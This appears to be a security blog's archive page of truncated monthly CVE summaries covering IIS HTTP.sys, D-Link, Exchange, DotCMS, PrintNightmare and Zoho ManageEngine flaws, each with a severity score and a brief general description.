Common Vulnerabilities and Exposures

CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability Description: The exploit works by spraying an IIS server via several large GET HTTP requests and finishes with a malformed HTTP request. Mitigation: Windows Server 2019 and Windows 10 version 1809 are not vulnerable by default. Unless you have enabled the HTTP Trailer Support via EnableTrailerSupport registry value, […]

Common Vulnerabilities & Exposures June 2021

Vulnerability 1: D-Link Insufficient Credential Protection (7.2 High) Description: D-Link is affected by a credential exposure vulnerability. Credential exposure allows an attacker the ability to access credentials without any hindrance at all, granting them access to critical systems. In the case of D-Link, credentials are insufficiently protected in D-Link DIR-2640-US 1.01B04 and in D-Link AC2600 (DIR-2640), credentials […]

Common Vulnerabilities & Exposures May 2021

Vulnerability 1: UPDATED Microsoft Exchange Server RCE (9.8 Critical) Description: Microsoft Exchange Server has a new remote code execution vulnerability (RCE). These RCE’s enable an attacker to gain allow an attacker to execute code on a computer via a file that could be sent via email or delivered by USB and when downloaded can deploy […]

Common Vulnerabilities & Exposures

Vulnerability 1: DotCMS Remote Code Execution Vulnerability (10.0 Critical) Description: A Remote Code Execution (RCE) vulnerability exists within DotCMS v5.2.3. An RCE attack involves an attacker executing code from an external location without, technically, physically operating on the compromised device. In DotCMS’ situation, an attacker is able to specially craft a HTTP POST request, through the […]

Common Vulnerabilities & Exposures

Vulnerability 1: Printnightmare Windows Spooler Service (9.0 Critical) Description: The Windows Spooler Service (WSS) holds a Remote Code Execution vulnerability. The WSS is used to implement the print roles for clients and servers, by enabling each connected system to act as a print client, administrative client or print server for printer services. A remote code execution (RCE) […]

Common Vulnerabilities and Exposures August 2021

Vulnerability 1: ManageEngine ADSelfService Plus CSV Injection Vulnerability (9.3 Critical)  Description: A CSV injection vulnerability lies within ManageEngine AD Self Service Plus system. A CSV injection attack involves an attacker exploiting improper validation techniques used by websites and web applications and by doing this they can execute applications and code. These types of attacks can be exploited […]

Common Vulnerabilities and Exposures – October 2022

Critical Zoho ManageEngine RCE Vulnerability On the 22nd September 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting Zoho ManageEngine products to their Known Exploited Vulnerabilities catalog. This vulnerability has a CVSS score of 9.8 and exploits a java deserialisation vulnerability that allows an unauthenticated […]